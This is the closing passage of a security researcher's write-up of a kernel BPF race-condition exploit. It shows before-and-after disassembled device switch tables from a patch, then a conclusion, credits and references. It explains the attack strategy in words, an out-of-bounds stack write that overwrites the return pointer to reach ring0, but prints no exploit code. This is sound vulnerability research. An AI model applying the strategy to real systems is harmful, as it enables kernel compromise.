                dq 0FFFFFFFFA16FF050h   ; d_mmap
                dq 0FFFFFFFFA16FF970h   ; d_strategy
                dq 0FFFFFFFFA16FF050h   ; d_dump
                dq 0FFFFFFFFA1820C90h   ; d_kqfilter
                dq 0                    ; d_purge
                dq 0FFFFFFFFA16FF050h   ; d_mmap_single
                dd -5E900FB0h, -1, 0    ; d_spare0
                dd 3 dup(0)             ; d_spare1
                dq 0                    ; d_devs
                dd 0                    ; d_spare2
                dq 0                    ; gianttrick
                dq 4EDE80000000000h     ; postfree_list

Post-Patch BPF cdevsw:

bpf_devsw       dd 17122009h            ; d_version
                                        ; DATA XREF: sub_FFFFFFFF9725DB40+1B↑o
                dd 80000000h            ; d_flags
                dq 0FFFFFFFF979538ACh   ; d_name
                dq 0FFFFFFFF9725DBB0h   ; d_open
                dq 0                    ; d_fdopen
                dq 0FFFFFFFF9738D230h   ; d_close
                dq 0FFFFFFFF9725DC90h   ; d_read
                dq 0h                   ; d_write
                dq 0FFFFFFFF9725E050h   ; d_ioctl
                dq 0FFFFFFFF9725F0B0h   ; d_poll
                dq 0FFFFFFFF9738F050h   ; d_mmap
                dq 0FFFFFFFF9738F920h   ; d_strategy
                dq 0FFFFFFFF9738F050h   ; d_dump
                dq 0FFFFFFFF9725F210h   ; d_kqfilter
                dq 0                    ; d_purge
                dq 0FFFFFFFF9738F050h   ; d_mmap_single
                dd 9738F050h, 0FFFFFFFFh, 0; d_spare0
                dd 3 dup(0)             ; d_spare1
                dq 0                    ; d_devs
                dd 0                    ; dev_spare2
                dq 0                    ; gianttrick
                dq 51EDE0000000000h     ; postfree_list

Notice the data for d_write is no longer a valid function pointer.

Conclusion

This was a pretty cool bug to exploit and write up. While the bug is not incredibly helpful on most other systems as it cannot be exploited from an unprivileged user, it is still valid as a method of going from root to ring0 code execution. I thought this would be a cool bug to write up (plus I love writing them anyway) as the attack strategy is fairly unique (using a race condition to trigger an out-of-bounds write on the stack). It's also a fairly trivial exploit to implement, and the strategy of overwriting the return pointer on the stack is easy for security researchers who are still learning to understand. It also highlights that while an attack strategy may be old (this one is perhaps the oldest there is), it can still be applied in modern exploitation with slight variations.

Credits

qwertyoruiopz

References

Watson FreeBSD Kernel Cross Reference

Microsoft Support : Description of race conditions and deadlocks